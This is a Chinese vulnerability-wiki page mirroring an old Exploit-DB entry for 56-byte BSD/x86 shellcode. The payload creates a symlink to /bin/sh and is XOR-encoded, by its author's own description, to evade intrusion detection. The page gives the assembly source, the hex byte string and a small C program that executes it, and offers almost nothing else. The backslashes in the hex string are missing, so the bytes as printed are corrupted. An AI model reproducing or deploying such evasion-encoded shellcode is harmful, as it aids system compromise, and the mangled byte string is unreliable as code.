BSD/x86 – symlink /bin/sh + XORing Encoded Shellcode (56 bytes)-安全小百科

BSD/x86 – symlink /bin/sh + XORing Encoded Shellcode (56 bytes)

漏洞ID	1054666	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	BSD_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13426

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*The shellcode calls the symlink() and makes the 
 link to the /bin/sh in the current dir.
	short version with anti IDS xoring
 size = 56 bytes
 OS   = *BSD
 	written by /rootteam/dev0id (www.sysworld.net)
				[email protected]
BITS 32
jmp short	callme
main:
	pop	esi
	xor	ecx,ecx
	mov	cl,32
main_loop:
	xor byte	[esi+ecx],0x0f
	loop	main_loop
	xor byte	[esi+ecx],0x0f
	push	esi
	ret	
callme:
xored_shellcode:
	call	main
	db 0xe4,0x1d,0x51,0x3e,0xcf,0x87,0x49,0x08,0x82,0x51,0x0a,0x5c,0x82,0x11,0x5c
	db 0xbf,0x36,0x5f,0xc2,0x8f,0xe7,0xe6,0xf0,0xf0,0xf0,0x20,0x6d,0x66,0x61,0x20
	db 0x7c,0x67
	
*/

char shellcode[] =
	"xebx11x5ex31xc9xb1x20x80x34x0ex0fxe2xfax80x34"
	"x0ex0fx56xc3xe8xeaxffxffxffxe4x1dx51x3excfx87"
	"x49x08x82x51x0ax5cx82x11x5cxbfx36x5fxc2x8fxe7"
	"xe6xf0xf0xf0x20x6dx66x61x20x7cx67";

int
main (void)
{
	void (*code)(void);
	code=(void(*)())shellcode;
	(void)code();
	return 0;
}

// milw0rm.com [2004-09-26]